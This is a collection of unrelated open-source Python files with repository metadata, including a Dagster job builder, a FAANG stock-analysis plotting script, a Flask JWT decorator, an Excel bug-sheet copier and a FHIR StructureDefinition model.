fa8970d696858d4094c92f803a24be8c5c86bc62 | d4a2b7a18a93c7a53909bd89ee210bed6191d33e | /MG5/4_4.py | d6b18b8d1273ac17c42ee9ff66b27f48e89c6b2f | [] | no_license | MichalGk94/Python | bbcf80237a26778cc54a88011eab2add3dfbd2e5 | e7f45de336241b9bc9d8bc9f7a6f4175ab746e20 | refs/heads/master | 2021-09-08T01:58:00.673264 | 2018-03-05T18:19:30 | 2018-03-05T18:19:30 | 106,870,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | def fibonacci(n):
wynik = 0
liczba = 0
if n <= 2:
return 1
elif n == 3:
return 2
else:
f1 = 1
f2 = 2
wynik = 0;
for i in range(2, n-1):
wynik = f1 + f2
f1 = f2
f2 = wynik
return wynik
x = input("Ktory wyraz chcesz otrzymac? ")
print fibonacci(x)
| [
"[email protected]"
] | |
f934729068d063b44311238abbd5b002b0319ae6 | f042383cbc9f10837ebdb5b9033a0263f6a43698 | /python_modules/dagster/dagster/core/asset_defs/assets_job.py | b510853c43b3a6bf0cbb7206a30b3fd81781f850 | [
"Apache-2.0"
] | permissive | helloworld/dagster | 664e6636d68bafa5151418c9d4316a565717f5ee | 779e27faa3e46b7d043cb9624617e655a9ed570c | refs/heads/master | 2022-03-24T12:15:36.626783 | 2022-02-26T01:34:29 | 2022-02-26T01:34:29 | 464,019,094 | 0 | 0 | Apache-2.0 | 2022-03-05T20:23:14 | 2022-02-27T02:38:17 | null | UTF-8 | Python | false | false | 11,534 | py | from typing import AbstractSet, Any, Dict, List, Mapping, Optional, Sequence, Tuple, Union, cast
from dagster import check
from dagster.core.definitions.config import ConfigMapping
from dagster.core.definitions.decorators.op import op
from dagster.core.definitions.dependency import (
DependencyDefinition,
IDependencyDefinition,
NodeInvocation,
)
from dagster.core.definitions.events import AssetKey
from dagster.core.definitions.executor_definition import ExecutorDefinition
from dagster.core.definitions.graph_definition import GraphDefinition
from dagster.core.definitions.job_definition import JobDefinition
from dagster.core.definitions.op_definition import OpDefinition
from dagster.core.definitions.output import Out, OutputDefinition
from dagster.core.definitions.partition import PartitionedConfig, PartitionsDefinition
from dagster.core.definitions.partition_key_range import PartitionKeyRange
from dagster.core.definitions.resource_definition import ResourceDefinition
from dagster.core.errors import DagsterInvalidDefinitionError
from dagster.core.execution.context.input import InputContext, build_input_context
from dagster.core.execution.context.output import build_output_context
from dagster.core.storage.fs_asset_io_manager import fs_asset_io_manager
from dagster.core.storage.root_input_manager import RootInputManagerDefinition, root_input_manager
from dagster.utils.backcompat import experimental
from dagster.utils.merger import merge_dicts
from .asset import AssetsDefinition
from .asset_partitions import get_upstream_partitions_for_partition_range
from .source_asset import SourceAsset
@experimental
def build_assets_job(
name: str,
assets: List[AssetsDefinition],
source_assets: Optional[Sequence[Union[SourceAsset, AssetsDefinition]]] = None,
resource_defs: Optional[Dict[str, ResourceDefinition]] = None,
description: Optional[str] = None,
config: Union[ConfigMapping, Dict[str, Any], PartitionedConfig] = None,
tags: Optional[Dict[str, Any]] = None,
executor_def: Optional[ExecutorDefinition] = None,
) -> JobDefinition:
"""Builds a job that materializes the given assets.
The dependencies between the ops in the job are determined by the asset dependencies defined
in the metadata on the provided asset nodes.
Args:
name (str): The name of the job.
assets (List[AssetsDefinition]): A list of assets or
multi-assets - usually constructed using the :py:func:`@asset` or :py:func:`@multi_asset`
decorator.
source_assets (Optional[Sequence[Union[SourceAsset, AssetsDefinition]]]): A list of
assets that are not materialized by this job, but that assets in this job depend on.
resource_defs (Optional[Dict[str, ResourceDefinition]]): Resource defs to be included in
this job.
description (Optional[str]): A description of the job.
Examples:
.. code-block:: python
@asset
def asset1():
return 5
@asset
def asset2(asset1):
return my_upstream_asset + 1
my_assets_job = build_assets_job("my_assets_job", assets=[asset1, asset2])
Returns:
JobDefinition: A job that materializes the given assets.
"""
check.str_param(name, "name")
check.list_param(assets, "assets", of_type=AssetsDefinition)
check.opt_list_param(source_assets, "source_assets", of_type=(SourceAsset, AssetsDefinition))
check.opt_str_param(description, "description")
source_assets_by_key = build_source_assets_by_key(source_assets)
op_defs = build_op_deps(assets, source_assets_by_key.keys())
root_manager = build_root_manager(source_assets_by_key)
partitioned_config = build_job_partitions_from_assets(assets)
return GraphDefinition(
name=name,
node_defs=[asset.op for asset in assets],
dependencies=op_defs,
description=description,
input_mappings=None,
output_mappings=None,
config=None,
).to_job(
resource_defs=merge_dicts(
{"io_manager": fs_asset_io_manager}, resource_defs or {}, {"root_manager": root_manager}
),
config=config or partitioned_config,
tags=tags,
executor_def=executor_def,
)
def build_job_partitions_from_assets(
assets: Sequence[AssetsDefinition],
) -> Optional[PartitionedConfig]:
assets_with_partitions_defs = [assets_def for assets_def in assets if assets_def.partitions_def]
if len(assets_with_partitions_defs) == 0:
return None
first_assets_with_partitions_def = assets_with_partitions_defs[0]
for assets_def in assets_with_partitions_defs:
if assets_def.partitions_def != first_assets_with_partitions_def.partitions_def:
first_asset_key = next(iter(assets_def.asset_keys)).to_string()
second_asset_key = next(iter(first_assets_with_partitions_def.asset_keys)).to_string()
raise DagsterInvalidDefinitionError(
"When an assets job contains multiple partitions assets, they must have the "
f"same partitions definitions, but asset '{first_asset_key}' and asset "
f"'{second_asset_key}' have different partitions definitions. "
)
assets_defs_by_asset_key = {
asset_key: assets_def for assets_def in assets for asset_key in assets_def.asset_keys
}
def asset_partitions_for_job_partition(
job_partition_key: str,
) -> Mapping[AssetKey, PartitionKeyRange]:
return {
asset_key: PartitionKeyRange(job_partition_key, job_partition_key)
for assets_def in assets
for asset_key in assets_def.asset_keys
if assets_def.partitions_def
}
def run_config_for_partition_fn(partition_key: str) -> Dict[str, Any]:
ops_config: Dict[str, Any] = {}
asset_partitions_by_asset_key = asset_partitions_for_job_partition(partition_key)
for assets_def in assets:
outputs_dict: Dict[str, Dict[str, Any]] = {}
if assets_def.partitions_def is not None:
for asset_key, output_def in assets_def.output_defs_by_asset_key.items():
asset_partition_key_range = asset_partitions_by_asset_key[asset_key]
outputs_dict[output_def.name] = {
"start": asset_partition_key_range.start,
"end": asset_partition_key_range.end,
}
inputs_dict: Dict[str, Dict[str, Any]] = {}
for in_asset_key, input_def in assets_def.input_defs_by_asset_key.items():
upstream_assets_def = assets_defs_by_asset_key[in_asset_key]
if (
assets_def.partitions_def is not None
and upstream_assets_def.partitions_def is not None
):
upstream_partition_key_range = get_upstream_partitions_for_partition_range(
assets_def, upstream_assets_def, in_asset_key, asset_partition_key_range
)
inputs_dict[input_def.name] = {
"start": upstream_partition_key_range.start,
"end": upstream_partition_key_range.end,
}
ops_config[assets_def.op.name] = {
"config": {
"assets": {
"input_partitions": inputs_dict,
"output_partitions": outputs_dict,
}
}
}
return {"ops": ops_config}
return PartitionedConfig(
partitions_def=cast(PartitionsDefinition, first_assets_with_partitions_def.partitions_def),
run_config_for_partition_fn=lambda p: run_config_for_partition_fn(p.name),
)
def build_source_assets_by_key(
source_assets: Optional[Sequence[Union[SourceAsset, AssetsDefinition]]]
) -> Mapping[AssetKey, Union[SourceAsset, OutputDefinition]]:
source_assets_by_key: Dict[AssetKey, Union[SourceAsset, OutputDefinition]] = {}
for asset_source in source_assets or []:
if isinstance(asset_source, SourceAsset):
source_assets_by_key[asset_source.key] = asset_source
elif isinstance(asset_source, AssetsDefinition):
for asset_key, output_def in asset_source.output_defs_by_asset_key.items():
if asset_key:
source_assets_by_key[asset_key] = output_def
return source_assets_by_key
def build_op_deps(
multi_asset_defs: List[AssetsDefinition], source_paths: AbstractSet[AssetKey]
) -> Dict[Union[str, NodeInvocation], Dict[str, IDependencyDefinition]]:
op_outputs_by_asset: Dict[AssetKey, Tuple[OpDefinition, str]] = {}
for multi_asset_def in multi_asset_defs:
for asset_key, output_def in multi_asset_def.output_defs_by_asset_key.items():
if asset_key in op_outputs_by_asset:
raise DagsterInvalidDefinitionError(
f"The same asset key was included for two definitions: '{asset_key.to_string()}'"
)
op_outputs_by_asset[asset_key] = (multi_asset_def.op, output_def.name)
op_deps: Dict[Union[str, NodeInvocation], Dict[str, IDependencyDefinition]] = {}
for multi_asset_def in multi_asset_defs:
op_name = multi_asset_def.op.name
op_deps[op_name] = {}
for asset_key, input_def in multi_asset_def.input_defs_by_asset_key.items():
if asset_key in op_outputs_by_asset:
op_def, output_name = op_outputs_by_asset[asset_key]
op_deps[op_name][input_def.name] = DependencyDefinition(op_def.name, output_name)
elif asset_key not in source_paths and not input_def.dagster_type.is_nothing:
raise DagsterInvalidDefinitionError(
f"Input asset '{asset_key.to_string()}' for asset '{op_name}' is not "
"produced by any of the provided asset ops and is not one of the provided "
"sources"
)
return op_deps
def build_root_manager(
source_assets_by_key: Mapping[AssetKey, Union[SourceAsset, OutputDefinition]]
) -> RootInputManagerDefinition:
source_asset_io_manager_keys = {
source_asset.io_manager_key for source_asset in source_assets_by_key.values()
}
@root_input_manager(required_resource_keys=source_asset_io_manager_keys)
def _root_manager(input_context: InputContext) -> Any:
source_asset_key = cast(AssetKey, input_context.asset_key)
source_asset = source_assets_by_key[source_asset_key]
@op(out={source_asset_key.path[-1]: Out(asset_key=source_asset_key)})
def _op():
pass
output_context = build_output_context(
name=source_asset_key.path[-1],
step_key="none",
solid_def=_op,
metadata=source_asset.metadata,
)
input_context_with_upstream = build_input_context(
name=input_context.name,
metadata=input_context.metadata,
config=input_context.config,
dagster_type=input_context.dagster_type,
upstream_output=output_context,
op_def=input_context.op_def,
)
io_manager = getattr(cast(Any, input_context.resources), source_asset.io_manager_key)
return io_manager.load_input(input_context_with_upstream)
return _root_manager
| [
"[email protected]"
] | |
158edc1ec3432b7254e2b4b94ef7abf43c183cd2 | 2eff6590e7fb5a1cffad5d00dd4f95489458b66b | /faang.py | 6e254eb0f239630939ba8dec3f522d97c3afb716 | [] | no_license | tmcbrigido/faang-stock | 47bed19645b4d8b6d29abcd5c8886b0bbdddbb89 | af2b653494df9596e1163073fdb82679a68f5066 | refs/heads/master | 2020-11-28T20:46:20.716330 | 2020-01-04T22:42:40 | 2020-01-04T22:42:40 | 229,916,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,605 | py | import datetime
import pandas_datareader.data as web
import matplotlib.pyplot as plt
from matplotlib import style
import matplotlib as mpl
# Define the timefrase used for this project
start = datetime.datetime(2014, 1, 1)
end = datetime.datetime(2019, 11, 30)
# Import the data that we will use
df = web.DataReader(["AAPL","AMZN","FB","NFLX","GOOGL"], 'yahoo', start, end)
df.tail()
AdjClose = df['Adj Close']
AdjClose.tail()
# Plot the Prices
mpl.rc('figure', figsize=(8,8))
style.use('ggplot')
AdjClose.plot(label='FAANG')
plt.legend()
# Daily and Monthly Returns
daily_returns = AdjClose.pct_change()
monthly_returns = AdjClose.resample('M').ffill().pct_change()
# Print Results
daily_returns.tail()
monthly_returns.tail()
# Monthly Returns for FAANG
fig = plt.figure()
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax5 = fig.add_subplot(325)
ax1.plot(monthly_returns['AMZN'])
ax1.set_title("Amazon")
ax2.plot(monthly_returns['AAPL'])
ax2.set_title("Apple")
ax3.plot(monthly_returns['FB'])
ax3.set_title("Facebook")
ax4.plot(monthly_returns['NFLX'])
ax4.set_title("Netflix")
ax5.plot(monthly_returns['GOOGL'])
ax5.set_title("Google")
plt.tight_layout()
plt.show()
# Histogram for Daily returns for Amazon
fig = plt.figure()
ax1 = fig.add_axes([0.1,0.1,0.8,0.8])
daily_returns['AMZN'].plot.hist(bins = 80)
ax1.set_xlabel("Daily returns %")
ax1.set_ylabel("Percent")
ax1.set_title("Amazon daily returns data")
ax1.text(-0.10,100,"Extreme Low\nreturns")
ax1.text(0.10,100,"Extreme High\nreturns")
plt.show()
# Cumulative Returns
cum_returns = (daily_returns + 1).cumprod()
# Plot the cumulative returns for FAAG
fig = plt.figure()
ax1 = fig.add_axes([0.1,0.1,0.8,0.8])
cum_returns.plot()
ax1.set_xlabel("Date")
ax1.set_ylabel("Growth of $1 investment")
ax1.set_title("FAAG daily cumulative returns data")
plt.show()
# Plot the cumulative returns in individual Graphs
fig = plt.figure()
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax5 = fig.add_subplot(325)
ax1.plot(cum_returns['AMZN'])
ax1.set_title("Amazon")
ax2.plot(cum_returns['AAPL'])
ax2.set_title("Apple")
ax3.plot(cum_returns['FB'])
ax3.set_title("Facebook")
ax4.plot(cum_returns['NFLX'])
ax4.set_title("Netflix")
ax5.plot(cum_returns['GOOGL'])
ax5.set_title("Google")
plt.tight_layout()
plt.show()
# Statistics for FAAG
# Mean Monthly Return
print(monthly_returns.mean()*100)
# Standard Deviation
print(monthly_returns.std())
# Correlation and Covariance for FAAG
corr = (monthly_returns.corr())
print(monthly_returns.cov())
# Moving Average for FAAG
mavg30 = AdjClose.rolling(window=30).mean()
mavg50 = AdjClose.rolling(window=50).mean()
mavg100 = AdjClose.rolling(window=100).mean()
# Plot the moving average for Amazon
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["AMZN"].plot(label='AMZN')
mavg100["AMZN"].plot(label='mavg')
plt.legend()
# Plot the moving average for all FAANG Stocks
fig = plt.figure()
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax5 = fig.add_subplot(325)
ax1.plot(AdjClose['AMZN'], label='AMZN')
ax1.plot(mavg100['AMZN'], label='mavg')
ax1.set_title("Amazon")
ax2.plot(AdjClose['AAPL'], label='AAPL')
ax2.plot(mavg100['AAPL'], label='mavg')
ax2.set_title("Apple")
ax3.plot(AdjClose['FB'], label='FB')
ax3.plot(mavg100['FB'], label='mavg')
ax3.set_title("Facebook")
ax4.plot(AdjClose['NFLX'], label='NFLX')
ax4.plot(mavg100['NFLX'], label='mavg')
ax4.set_title("Netflix")
ax5.plot(AdjClose['GOOGL'], label='GOOGL')
ax5.plot(mavg100['GOOGL'], label='mavg')
ax5.set_title("Google")
plt.tight_layout()
plt.show()
# Plot Simple Moving Averages for Amazon
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["AMZN"].plot(label='AMZN')
mavg30["AMZN"].plot(label='mavg30')
mavg50["AMZN"].plot(label='mavg50')
mavg100["AMZN"].plot(label='mavg100')
plt.xlim('2017-01-01','2019-11-30')
plt.legend()
# Plot Simple Moving Averages for Apple
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["AAPL"].plot(label='AAPL')
mavg30["AAPL"].plot(label='mavg30')
mavg50["AAPL"].plot(label='mavg50')
mavg100["AAPL"].plot(label='mavg100')
plt.xlim('2017-01-01','2019-11-30')
plt.legend()
# Plot Simple Moving Averages for Netflix
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["NFLX"].plot(label='NFLX')
mavg30["NFLX"].plot(label='mavg30')
mavg50["NFLX"].plot(label='mavg50')
mavg100["NFLX"].plot(label='mavg100')
plt.xlim('2017-01-01','2019-11-30')
plt.legend() | [
"[email protected]"
] | |
e18fa20d8366072fbd6170c21806e8cf7de9ff27 | df7d656303b70b2a9b1222666365818b1062da67 | /Rutinas.py | 316ab058a8ead5c72d3b3e58207c40306ed64e71 | [] | no_license | sebassilva/brotecito | 5a0d291a4b2c2e61e484f8474e59256f8977646c | 12f7bab947acba45720c6c3feb4324d77f6eb071 | refs/heads/master | 2020-09-12T20:18:32.172464 | 2019-11-20T00:49:50 | 2019-11-20T00:49:50 | 222,541,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | from datetime import timedelta
class Rutinas:
def __init__(self):
seconds = timedelta()
pass
def luz(self,sensor):
sensor.when_light = self.light
def light(self):
print("Hay luz")
seconds = seconds + timedelta(seconds=1)
| [
"[email protected]"
] | |
6b5ac68b2b62cef373c03502f2023abeff8a9711 | 09100581ec44e41dca30979bf097c2387015b071 | /the_foodie_network_app/resources/util.py | a0c81621c3a880e239bdbe472d1e8118c87fd456 | [] | no_license | akashmantry/the_foodie_network_backend | 0189a090b73a1bb8c208e61a4fe1d3a8086f8acb | 8251005fed0e747915e064f0644c9a16f87c9294 | refs/heads/master | 2021-05-07T09:01:59.003849 | 2017-11-03T23:38:37 | 2017-11-03T23:38:37 | 109,451,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | from flask import request
from functools import wraps
from the_foodie_network_app.config import Config
import jwt
from the_foodie_network_app.database.models import User
def token_required(func):
@wraps(func)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return {'success': False, 'error_code': 8, 'message': 'Token eis missing'}, 401
try:
data = jwt.decode(token, Config.SECRET_KEY)
current_user = User.get_user_by_public_id(data['public_user_id'])
except jwt.ExpiredSignatureError:
return {'success': False, 'error_code': 4, 'message': 'Token expired. Please login again'}, 401
except jwt.InvalidTokenError:
return {'success': False, 'error_code': 5, 'message': 'Invalid token'}, 401
except:
return {'success': False, 'error_code': 6, 'message': "User doesn't exist"}, 401
return func(current_user, *args, **kwargs)
return decorated | [
"[email protected]"
] | |
425b9a76d9a527064777ddeb9460337e3badf4ef | 55f43997fba47dd72dd9863a9649d8d353a25f51 | /instagram/wsgi.py | 7b71ccc654f816bb0e9a08ac3cbbccaac39d9343 | [
"MIT"
] | permissive | LoiseMwarangu/Instagram | ce4b06dc1b14d3345cc8691cfbc4fc02d9d13c81 | 1bb0791a69350e0b9a3d2864d7132c6a605360d7 | refs/heads/master | 2022-12-14T21:24:48.881581 | 2019-03-14T14:14:18 | 2019-03-14T14:14:18 | 174,509,456 | 0 | 0 | NOASSERTION | 2022-12-08T03:01:37 | 2019-03-08T09:37:54 | Python | UTF-8 | Python | false | false | 258 | py | import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "instagram.settings")
application = get_wsgi_application()
application=DjangoWhiteNoise(application)
| [
"[email protected]"
] | |
fca6aa6b50454400c806572c6da45f3e3a03cb48 | 74eee1efe84d49084731833fad23de75334a0a25 | /excel练习/excel_copy.py | 9bf91badd0301e38010c37fdd3e2e8ac5d6a671e | [] | no_license | chengengyu/Python | 61de4f717d8994dd7aee102a126771d4fc9600f1 | ba771069e8d5c5bb827c1d727f0fc609b37fa06a | refs/heads/master | 2022-02-25T19:50:12.241692 | 2022-02-13T05:48:36 | 2022-02-13T05:48:36 | 73,597,658 | 0 | 0 | null | 2016-11-20T09:54:05 | 2016-11-13T05:34:20 | Python | UTF-8 | Python | false | false | 1,627 | py | __author__ = 'eling'
from openpyxl import Workbook, load_workbook
import copy
class BugInfo(object):
def __init__(self, BugNum, OpenInfo, ResolveInfo, CloseInfo):
self.BugNum = BugNum
self.OpenInfo = OpenInfo
self.ResolveInfo = ResolveInfo
self.CloseInfo = CloseInfo
SourceFileName = input("上一次的汇总表xls: ")
DesFileName = input("本次的汇总表:")
SourWb = load_workbook(SourceFileName)
SourWs = SourWb.active
Sour = {}
#读取源表,讲内容根据DTMUC号存放在字典中
for row in SourWs.rows:
bug = BugInfo(row[0].value, row[1].value, row[2].value, row[3].value)
Sour[bug.BugNum] = bug
#读取新的表
DesWb = load_workbook(DesFileName)
DesWs = DesWb["高层算法组"]
SaveWb = Workbook()
SaveWs = SaveWb.active
SaveWs.title = "高层算法组"
#将算法组的内容拷贝到一个新的表中
for numRow, row in enumerate(DesWs.rows):
SaveWs.append(row)
#遍历新的表,判断DTMUC号如果存在在源表中,则讲需要copy的内容复制过去
for num, rowEx in enumerate(SaveWs.rows):
if rowEx[0].value in Sour:
print(rowEx[0].value )
bugSour = Sour[rowEx[0].value]
#print(bugSour.OpenInfo)
if bugSour.OpenInfo:
cellNum = 'B'+str(num + 1)
SaveWs[cellNum] = bugSour.OpenInfo
if bugSour.ResolveInfo:
cellNum = 'C'+str(num + 1)
SaveWs[cellNum] = bugSour.ResolveInfo
if bugSour.CloseInfo:
cellNum = 'D'+str(num + 1)
SaveWs[cellNum] = bugSour.CloseInfo
SaveWb.save("test.xlsx")
input("All Done, press any key to continue.") | [
"[email protected]"
] | |
3dd51cde5fdbdc6321338ce9a565bb6b23112c26 | 30109f5f173f4e51a20cfcaf6ec41628b177f553 | /fhir/resources/structuredefinition.py | 56118989c2386d775da26b02b7cf0d5bf1a7f79c | [
"BSD-3-Clause"
] | permissive | arkhn/fhir.resources | 82c8f705c8f19e15621f2bb59fd17600c0ef3697 | 122e89c8599c4034bb3075b31d1a1188e377db91 | refs/heads/master | 2022-12-16T07:58:19.448071 | 2020-08-13T03:59:37 | 2020-08-13T03:59:37 | 288,683,730 | 1 | 0 | NOASSERTION | 2020-08-19T09:01:02 | 2020-08-19T09:01:01 | null | UTF-8 | Python | false | false | 23,609 | py | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/StructureDefinition
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from typing import List as ListType
from typing import Union
from pydantic import Field
from . import backboneelement, domainresource, fhirtypes
class StructureDefinition(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Structural Definition.
A definition of a FHIR structure. This resource is used to describe the
underlying resources, data types defined in FHIR, and also for describing
extensions and constraints on resources and data types.
"""
resource_type = Field("StructureDefinition", const=True)
abstract: bool = Field(
...,
alias="abstract",
title="Whether the structure is abstract",
description=(
"Whether structure this definition describes is abstract or not - that"
" is, whether the structure is not intended to be instantiated. For "
"Resources and Data types, abstract types will never be exchanged "
"between systems."
),
# if property is element of this resource.
element_property=True,
)
abstract__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_abstract", title="Extension field for ``abstract``."
)
baseDefinition: fhirtypes.Canonical = Field(
None,
alias="baseDefinition",
title="Definition that this type is constrained/specialized from",
description=(
"An absolute URI that is the base structure from which this type is "
"derived, either by specialization or constraint."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["StructureDefinition"],
)
baseDefinition__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_baseDefinition", title="Extension field for ``baseDefinition``."
)
contact: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
context: ListType[fhirtypes.StructureDefinitionContextType] = Field(
None,
alias="context",
title="If an extension, where it can be used in instances",
description=(
"Identifies the types of resource or data type elements to which the "
"extension can be applied."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant: ListType[fhirtypes.String] = Field(
None,
alias="contextInvariant",
title="FHIRPath invariants - when the extension can be used",
description=(
"A set of rules as FHIRPath Invariants about when the extension can be "
"used (e.g. co-occurrence variants for the extension). All the rules "
"must be true."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant__ext: ListType[
Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(
None,
alias="_contextInvariant",
title="Extension field for ``contextInvariant``.",
)
copyright: fhirtypes.Markdown = Field(
None,
alias="copyright",
title="Use and/or publishing restrictions",
description=(
"A copyright statement relating to the structure definition and/or its "
"contents. Copyright statements are generally legal restrictions on the"
" use and publishing of the structure definition."
),
# if property is element of this resource.
element_property=True,
)
copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_copyright", title="Extension field for ``copyright``."
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the structure definition was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the structure definition "
"changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
derivation: fhirtypes.Code = Field(
None,
alias="derivation",
title="specialization | constraint - How relates to base definition",
description="How the type relates to the baseDefinition.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["specialization", "constraint"],
)
derivation__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_derivation", title="Extension field for ``derivation``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the structure definition",
description=(
"A free text natural language description of the structure definition "
"from a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
differential: fhirtypes.StructureDefinitionDifferentialType = Field(
None,
alias="differential",
title="Differential view of the structure",
description=(
"A differential view is expressed relative to the base "
"StructureDefinition - a statement of differences that it applies."
),
# if property is element of this resource.
element_property=True,
)
experimental: bool = Field(
None,
alias="experimental",
title="For testing purposes, not real usage",
description=(
"A Boolean value to indicate that this structure definition is authored"
" for testing purposes (or education/evaluation/marketing) and is not "
"intended to be used for genuine usage."
),
# if property is element of this resource.
element_property=True,
)
experimental__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_experimental", title="Extension field for ``experimental``."
)
fhirVersion: fhirtypes.Code = Field(
None,
alias="fhirVersion",
title="FHIR Version this StructureDefinition targets",
description=(
"The version of the FHIR specification on which this "
"StructureDefinition is based - this is the formal version of the "
"specification, without the revision number, e.g. "
"[publication].[major].[minor], which is 4.0.1. for this version."
),
# if property is element of this resource.
element_property=True,
)
fhirVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_fhirVersion", title="Extension field for ``fhirVersion``."
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the structure definition",
description=(
"A formal identifier that is used to identify this structure definition"
" when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
jurisdiction: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="jurisdiction",
title="Intended jurisdiction for structure definition (if applicable)",
description=(
"A legal or geographic region in which the structure definition is "
"intended to be used."
),
# if property is element of this resource.
element_property=True,
)
keyword: ListType[fhirtypes.CodingType] = Field(
None,
alias="keyword",
title="Assist with indexing and finding",
description=(
"A set of key words or terms from external terminologies that may be "
"used to assist with indexing and searching of templates nby describing"
" the use of this structure definition, or the content it describes."
),
# if property is element of this resource.
element_property=True,
)
kind: fhirtypes.Code = Field(
...,
alias="kind",
title="primitive-type | complex-type | resource | logical",
description="Defines the kind of structure that this definition is describing.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["primitive-type", "complex-type", "resource", "logical"],
)
kind__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_kind", title="Extension field for ``kind``."
)
mapping: ListType[fhirtypes.StructureDefinitionMappingType] = Field(
None,
alias="mapping",
title="External specification that the content is mapped to",
description="An external specification that the content is mapped to.",
# if property is element of this resource.
element_property=True,
)
name: fhirtypes.String = Field(
...,
alias="name",
title="Name for this structure definition (computer friendly)",
description=(
"A natural language name identifying the structure definition. This "
"name should be usable as an identifier for the module by machine "
"processing applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the "
"structure definition."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
purpose: fhirtypes.Markdown = Field(
None,
alias="purpose",
title="Why this structure definition is defined",
description=(
"Explanation of why this structure definition is needed and why it has "
"been designed as it has."
),
# if property is element of this resource.
element_property=True,
)
purpose__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_purpose", title="Extension field for ``purpose``."
)
snapshot: fhirtypes.StructureDefinitionSnapshotType = Field(
None,
alias="snapshot",
title="Snapshot view of the structure",
description=(
"A snapshot view is expressed in a standalone form that can be used and"
" interpreted without considering the base StructureDefinition."
),
# if property is element of this resource.
element_property=True,
)
status: fhirtypes.Code = Field(
...,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this structure definition. Enables tracking the life-"
"cycle of the content."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this structure definition (human friendly)",
description=(
"A short, descriptive, user-friendly title for the structure " "definition."
),
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
type: fhirtypes.Uri = Field(
...,
alias="type",
title="Type defined or constrained by this structure",
description=(
"The type this structure describes. If the derivation kind is "
"'specialization' then this is the master definition for a type, and "
"there is always one of these (a data type, an extension, a resource, "
"including abstract ones). Otherwise the structure definition is a "
"constraint on the stated type (and in this case, the type cannot be an"
" abstract type). References are URLs that are relative to "
'http://hl7.org/fhir/StructureDefinition e.g. "string" is a reference '
"to http://hl7.org/fhir/StructureDefinition/string. Absolute URLs are "
"only allowed in logical models."
),
# if property is element of this resource.
element_property=True,
)
